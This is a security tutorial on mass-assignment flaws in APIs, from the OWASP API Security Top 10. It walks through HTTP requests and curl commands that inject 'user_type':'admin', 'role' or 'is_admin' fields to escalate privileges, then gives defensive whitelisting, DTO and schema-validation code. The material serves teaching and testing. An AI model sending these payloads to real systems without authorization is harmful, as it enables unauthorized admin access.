🔐 OWASP API Security Top 10

API6:2023 - Mass Assignment Vulnerability

📋 Overview

Mass Assignment is a critical security vulnerability that occurs when an application automatically binds client-provided data to internal object properties without proper filtering. This vulnerability allows attackers to modify object properties that should not be publicly accessible, potentially leading to privilege escalation and unauthorized access.

What is Mass Assignment?

Mass Assignment happens when developers create object instances and expose internal parameters that should remain private. For example, when creating a user object, developers might include sensitive fields like account_type, is_admin, or role. If these parameters are not properly protected, attackers can manipulate them through API requests.

🎯 Real-World Scenario

Consider a typical user registration or profile update system. Developers create a user object with various properties including publicly editable fields (name, email) and sensitive fields (user_type, permissions, account_status). If the API endpoint doesn't validate which fields can be modified, attackers can inject unauthorized parameters.

Attack Flow Diagram

Normal User Request

→

Add Hidden Parameter

→

Privilege Escalation

→

Admin Access Gained

🔬 Practical Exploitation Example

Step 1: Normal API Request

First, let's examine a legitimate user profile update request:

POST /api/user HTTP/1.1

Content-Type: application/json

Authorization: Bearer [your_token]

{
"name": "John",
"last_name": "Doe"
}

This request updates the user's name fields, which is expected behavior.

Step 2: Analyzing the Response

After sending the legitimate request, examine the API response:

{
  "status": "success",
  "data": {
    "name": "John",
    "last_name": "Doe",
    "user_type": "user",
    "account_id": 12345
  }
}

⚠️ Security Issue Detected: The response reveals the user_type parameter, which indicates internal role classification. This parameter should never be exposed or modifiable by users.

Step 3: Exploiting Mass Assignment

Now, attempt to modify the hidden parameter by including it in your request:

POST /api/user HTTP/1.1

Content-Type: application/json

Authorization: Bearer [your_token]

{
  "name": "John",
  "last_name": "Doe",
  "user_type": "admin"
}

🚨 Attack Vector Explanation

By copying the user_type parameter from the response and changing its value from "user" to "admin", the attacker attempts to elevate their privileges. If the API doesn't validate incoming parameters, this modification will be accepted, granting unauthorized administrative access.

Step 4: Verification

After sending the malicious request, check the response:

{
  "status": "success",
  "data": {
    "name": "John",
    "last_name": "Doe",
    "user_type": "admin",
    "account_id": 12345
  }
}

🔓 Vulnerability Confirmed: The user_type has been successfully changed to "admin". This indicates a successful privilege escalation attack through mass assignment.

🛡️ Defense Mechanisms

1. Whitelist Allowed Parameters

Only accept and process explicitly defined parameters that users should be able to modify.

                    // Example in Node.js/Express

                    const allowedFields = ['name', 'last_name', 'email'];

                    const updateData = {};

                    allowedFields.forEach(field => {

                      if (req.body[field] !== undefined) {

                        updateData[field] = req.body[field];

                      }

                    });

2. Use Data Transfer Objects (DTOs)

Create specific objects that define exactly what data can be transferred between client and server.

                    // Example DTO in TypeScript

                    class UpdateUserDTO {

                      name: string;

                      last_name: string;

                      email: string;

                      // user_type is NOT included

                    }

3. Implement Property-Level Authorization

Verify that the current user has permission to modify each specific property.

                    // Check permissions before updating

                    if (req.body.user_type && !user.isAdmin()) {

                      throw new UnauthorizedError('Cannot modify user_type');

                    }

4. Use Schema Validation

Implement strict schema validation to reject requests with unexpected fields.

                    // Example using Joi validation library

                    const schema = Joi.object({

                      name: Joi.string().required(),

                      last_name: Joi.string().required(),

                      email: Joi.string().email()

                    }).unknown(false); // Reject unknown fields

🔍 Testing Methodology

How to Test for Mass Assignment Vulnerabilities

Intercept API Requests: Use tools like Burp Suite or OWASP ZAP to capture API traffic
Analyze Responses: Look for parameters in responses that aren't in your requests
Test Parameter Injection: Add discovered parameters to your requests with modified values
Check Common Vulnerable Fields: Test fields like role, admin, user_type, is_admin, permissions, status, etc.
Verify Changes: Confirm if unauthorized modifications were accepted

Common Testing Commands

curl -X POST https://api.example.com/user -H "Content-Type: application/json" -d '{"name":"John","user_type":"admin"}'

curl -X PUT https://api.example.com/profile -H "Authorization: Bearer TOKEN" -d '{"email":"[email protected]","role":"administrator"}'

curl -X PATCH https://api.example.com/account -H "Content-Type: application/json" -d '{"username":"hacker","is_admin":true}'

📊 Vulnerability Impact Assessment

Impact Category	Severity	Description
Privilege Escalation	CRITICAL	Attackers can elevate their permissions to admin or superuser levels
Data Manipulation	HIGH	Unauthorized modification of sensitive database records
Account Takeover	CRITICAL	Ability to modify account ownership or authentication parameters
Business Logic Bypass	HIGH	Circumventing payment systems, approval workflows, or verification processes
Compliance Violations	MEDIUM	Breach of GDPR, PCI-DSS, or other regulatory requirements

💡 Key Takeaways

Mass Assignment occurs when APIs automatically bind user input to object properties without validation
Even if parameters are not visible in the UI, they can be discovered through API responses
Always use whitelisting instead of blacklisting for parameter validation
Implement proper authorization checks for all modifiable properties
Use DTOs and schema validation to enforce strict data contracts
Never trust client-side data—always validate on the server
Regularly audit your API endpoints for exposed sensitive parameters

🔗 Additional Resources

OWASP API Security Project: https://owasp.org/www-project-api-security/
OWASP API Security Top 10 2023
CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes
Testing tools: Burp Suite, OWASP ZAP, Postman, curl